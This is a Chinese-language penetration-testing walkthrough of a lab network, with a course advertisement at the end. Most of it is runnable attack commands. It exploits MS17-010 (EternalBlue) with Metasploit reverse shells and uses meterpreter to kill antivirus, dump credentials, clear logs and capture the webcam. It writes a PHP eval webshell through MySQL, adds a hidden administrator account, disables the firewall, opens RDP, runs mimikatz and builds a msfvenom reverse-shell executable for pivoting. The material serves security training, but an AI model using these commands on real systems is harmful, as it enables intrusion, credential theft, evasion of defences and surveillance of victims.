0x01.虚拟机网络拓扑图

0x02.web外围打点，获取边界权限

1.通过对web外部靶机进行信息收集，发现存在80，445，3306等敏感信息端口

2.通过御剑扫描目录，得到敏感文件目录,其下有一个beifei.rar，phpmyadmin ，并且在192.168.0.106/phpmyadmin/ 发现数据库密码是弱口令 root root

通过beifei.rar文件中的 beifen\yxcms\protected\config.php 可以看见数据库密码

通过端口和目录文件,发现目前有两种方向可以利用，一种是利用phpmyadmin平台上传webshell,另外一种是利用445ms17-010。

3.漏洞利用

（1）ms17-010利用，详细参考链接：

1.搜索模块        
search  ms17-010
2.判断是否存在ms17-010  
use auxiliary/scanner/smb/smb_ms17_010 
set rhosts 192.168.01.06
run
出现下面这条语句证明存在ms17-010漏洞 
Host is likely VULNERABLE to MS17-010! 
- Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
3.利用ms17-010漏洞
use exploit/windows/smb/ms17_010_eternalblue
设置set payload 攻击模块
set payload windows/x64/meterpreter/reverse_tcp
或者 set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.01.06
run

漏洞存在截图：

漏洞利用成功截图

查看权限   getuid
查询进程号 getpid
进行迁移 migrate
进程随机迁移 run post/windows/manage/migrate
检查目标机器是否运行在虚拟机上  run post/windows/gather/checkvm
关闭杀毒软件 run post/windows/manage/killav
启动远程桌面 run post/windows/manage/enable_rdp
获取用户密码  load kiwi     creds_all
清楚日志  clearev
运行时间 idletime
查看本地子网  run post/windows/manage/autoroute
查看有多少用户登录 run post/windows/gather/enum_logged_on_users
列举安装目标机上的应用程序 run post/windows/gather/enum_applications
抓取目标机屏幕截图 load espia  screengrab
查看是否有摄像头 webcam_list
打开摄像头拍一张照片 webcam_snap
打开直播模式  webcam_stream
搜索文件 search -f *.txt -d c:\:
下载文件 download c:\test /root
上传文件 upload /root/test.txt c:\:

关闭杀软截图：

获取密码截图：

开始3389截图：

方法二：利用phpmyadmin上传webshell获取权限

（1）利用sql语句进行文件写入

前提条件

3.1.mysql允许文件导出 secure_file_priv = NULL #表示不允许 secure_file_priv = 空或者/ #表示没有限制 secure_file_priv = 具体目录 /tmp #表示只允许在/tmp目录下 secure_file_priv 只能在mysql的配置文件中修改

测试语句

show variables like 'secure_file_priv'

select "<?php eval($_POST[cmd]);?>"  into outfile "C:/phpStudy/PHPTutorial/WWW/shell.php"

表示不能导入导出

3.2.日志getshell

#查看日志状态
				SHOW VARIABLES LIKE "%general%"
#启用日志
				set global general_log =on 
#改变日志路径
set  global general_log_file='C:/phpStudy/PHPTutorial/WWW/log.php'
#写入一句话
select '<?php @eval($_POST[123])?>;'

查看日志状态

启动日志和改变日志路径

写入一句话

3.利用特定的版本文件包含漏洞

用蚁剑链接已经上传成功的码

获取主机权限信息收集

systeminfo    查看系统详细信息，如OS版本、补丁安装情况，可以根据这些信息筛选可利用的漏洞
net start     查看启动进程，可以根据启动进程判断主机在域中扮演的角色
tasklist      查看进程列表
netstat -ano  查看端口开放情况
net view /domain  判断是否存在域
ipconfig /all    查看主机名、域DNS、IP
net view         查看域内主机 
net time /domain   域内主机以域服务器时间为准，故该命令可用于判断DC
nslookup 域名     查看IP
net config workstation    查看登录信息
whoami /all        查看用户信息
net user /domain   查看域内用户，可以将其作为字典，对其他主机的密码进行爆破
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="   探针域内存活主机

whoami /all查看权限，该权限为最高管理员权限

创建一个用户并把这个用户加入到管理员组中

net user hacker [email protected]## /add   创建用户
net localgroup administrators hacker  /add   将创建的用户添加到administrators组中

查看防火墙状态和关闭防火墙

 netsh advfirewall show allprofile state  查看防火墙的当前状态
 netsh advfirewall set  allprofile state off  关闭防火墙

打开3389端口进行远程登陆

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

4.远程登陆到边缘设备

5.上次mimikatz抓取密码

#管理员启动
privilege::debug
sekurlsa::logonPasswords

0x03.内网渗透

1.做代理ew和proxy

在边界服务器上上穿ew代理socks5

ew_for_windows.exe -s ssocksd -l 8000

采用ew套接字代理，服务器上运行准备好的ew_for_windows.exe，本地使用proxifier配置如下：

代理规则配置如上，可以根据情况具体配置，以上是Windows端的配置，但是渗透难免会用到kali，所以kali也需要配置：

vi /etc/proxychains4.conf  #修改如图下面即可

修改后的截图：

代理成功截图

2.msf做代理

利用msf生成马儿让目标运行，反弹回来meterpreter查看路由添加路由，然后msf就可以访问内网，可以使用msf来探测以及渗透测试。

（1）生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

把生成的666.exe上传到边缘靶机中即192.168.0.106机器中，然后点击运行

（2）kali监听端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
run

添加路由

第一步：run get_local_subnets （获取当前路由）
第二步：run autoroute -s 192.168.52.0/24 （添加路由）
第三步：run autoroute -p （查看已添加路由）

攻击pyload

第一步：background（转换到后台）

第二步：use auxiliary/scanner/smb/smb_ms17_010

3.内网渗透：

3.1内网信息收集

（1）.将fscan上传到边缘机器上进行内网扫描fscan

扫描出来的内网资产以及端口

3.2漏洞利用

对内网两台主机进行ms17-010漏洞利用

对内网主机192.168.52.138

显示内网其原因是有其他的安全防护

对主机192.168.52.139进行ms17-010漏洞利用同样也是具有其他的安全防护

参考资料

[0]参考文章:https://blog.csdn.net/qq_56607768/article/details/124837702

如果想要系统学习网络安全技术

不妨加入知识星球课程

《60天入门网络安全渗透测试》

从入门到案例，贴合实战

轻松易懂、好玩实用

限时领取

知识星球

超值 | 一起学网络安全! 授人以鱼不如授人以渔!

活动优惠券

跟着60天入门学习路线一起学

期待你的到来！

更多内容请关注公众号

网络安全自修室